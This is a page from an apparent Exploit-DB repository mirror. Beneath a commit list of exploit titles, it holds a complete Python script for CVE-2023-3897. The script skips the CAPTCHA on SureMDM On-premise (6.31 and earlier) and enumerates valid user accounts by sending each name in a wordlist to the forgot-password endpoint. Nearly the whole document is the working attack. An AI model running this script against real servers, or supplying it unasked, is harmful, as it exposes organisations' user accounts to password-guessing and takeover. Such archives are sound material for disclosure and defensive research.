
9 changes to exploits/shellcodes/ghdb SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration Wondercms 4.3.2 - XSS to RCE Employee Management System v1 - 'email' SQL Injection JFrog Artifactory < 7.25.4 - Blind SQL Injection phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit XAMPP - Buffer Overflow POC Microsoft Windows Defender - VBScript Detection Bypass Microsoft Windows Defender Bypass - Detection Mitigation Bypass
55 lines
No EOL
1.6 KiB
Text
55 lines
No EOL
1.6 KiB
Text
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
|
|
# Date: 05/12/2023
|
|
# Exploit Author: Jonas Benjamin Friedli
|
|
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
|
|
# Version: <= 6.31
|
|
# Tested on: 6.31
|
|
# CVE : CVE-2023-3897
|
|
|
|
import requests
|
|
import sys
|
|
|
|
def print_help():
|
|
print("Usage: python script.py [URL] [UserListFile]")
|
|
sys.exit(1)
|
|
|
|
|
|
def main():
|
|
if len(sys.argv) != 3 or sys.argv[1] == '-h':
|
|
print_help()
|
|
|
|
url, user_list_file = sys.argv[1], sys.argv[2]
|
|
|
|
try:
|
|
with open(user_list_file, 'r') as file:
|
|
users = file.read().splitlines()
|
|
except FileNotFoundError:
|
|
print(f"User list file '{user_list_file}' not found.")
|
|
sys.exit(1)
|
|
|
|
valid_users = []
|
|
bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
|
|
enumerate_txt = "This User ID/Email ID is not registered."
|
|
for index, user in enumerate(users):
|
|
progress = (index + 1) / len(users) * 100
|
|
print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")
|
|
|
|
data = {"UserId": user}
|
|
response = requests.post(
|
|
f"{url}{bypass_dir}",
|
|
json=data,
|
|
headers={"Content-Type": "application/json; charset=utf-8"}
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
response_data = response.json()
|
|
if enumerate_txt not in response_data.get('d', {}).get('message', ''):
|
|
valid_users.append(user)
|
|
|
|
print("\nFinished processing users.")
|
|
print(f"Valid Users Found: {len(valid_users)}")
|
|
for user in valid_users:
|
|
print(user)
|
|
|
|
if __name__ == "__main__":
|
|
main() |